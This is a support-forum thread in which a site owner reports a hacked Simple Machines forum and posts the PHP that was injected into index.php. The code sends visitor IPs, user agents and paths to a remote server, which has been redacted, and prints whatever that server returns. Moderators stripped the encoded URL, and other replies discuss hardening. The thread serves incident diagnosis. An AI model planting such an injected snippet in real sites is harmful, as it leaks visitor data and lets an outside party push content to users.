News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

Nasty, Hidden Virus on Simple Machines

Started by Flavious, October 06, 2011, 04:47:06 PM

Previous topic - Next topic
Print
Go Down Pages 1 2 3 4
User actions

OCJ

#60
May 03, 2012, 03:04:35 AM Last Edit: May 04, 2012, 06:35:26 AM by Yoshi2889
Update ... hacked again.


Site was a bit slow and then avg browser guard stated giving warnings. I dont have access logs older than a few days and wouldnt know what to look for anyway. It seems like the index.php file was changed - before last data in the raw logs, on the 28th April.

Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.

Code Select

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry 1;
    // This code use for global bot statistic
    $sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle NULL;
    $stCurlLink "";
    if((strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink base64_decode'{snap}').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    curl_setopt($stCurlHandleCURLOPT_TIMEOUT12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O"
     {$sResult[0]=" ";
      echo $sResult// Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

(edit: removed base64 string to render code (semi-)unusable)

nend

#61
May 03, 2012, 09:51:46 AM Last Edit: May 03, 2012, 03:24:43 PM by Yoshi2889
If you decode the base64 that is in the script you end up with this url.

Code Select
http://{snap}.com/stat/stat.php

The site is unavailable though.  :-\

(edit: removed possible malicious URL)

青山 素子

#62
May 03, 2012, 03:24:23 PM
You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site obfuscate the code and URL a bit so people won't be tempted to try things.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.

NanoSector

#63
May 04, 2012, 06:36:20 AM
I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Robert.

#64
May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

青山 素子

#65
May 04, 2012, 11:17:58 AM
Quote from: 医生唱片骑师 on May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

That only  works if the code is at the end. I've seen it injected at the front as well. At best, you will have maybe a 50% chance of it helping.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.

OCJ

#66
May 29, 2012, 01:20:27 AM Last Edit: May 29, 2012, 03:27:44 AM by igirisjin
update:

One thing happened today that also happened at the time the site was first hacked, and only those times.

This was related to playing movies in Aeva media. It shows a plugin required and link to download. Someone clicked it and got a virus warning.. and infection. So much for their security shield.
Last time the site had trouble I also tried using the aeva movie plugin download link. It didnt work playing the movies either. These actions only happened twice and both coincidentally related to virus trouble through SMF/Aeva media.

I know some so called free firefox plugins from dodgy commercial site have caused similar problems.

Not sure if this error is related or not.

XML Parsing Error: junk after document element
Location: http://site .com/index.php?action=media;sa=mass;album=37;xml;upcook=YTo0OntpOjA7czozOiIxOTMiO2k6MTtzOjQwOiI5OTNiNTQzNDIwOWQzYTNjOTAwYTA3YmZkNmQ2ODU4MDA2MDBiNmQyIjtpOjI7aToxNTEzMjkzNzI3O2k6MztpOjE7fQ%3D%3D
Line Number 14, Column 2:    <div class="centertext"><a href="javascript:history.go(-1)">Back</a></div>
--------^
Print
Go Up Pages 1 2 3 4
User actions
Advertisement: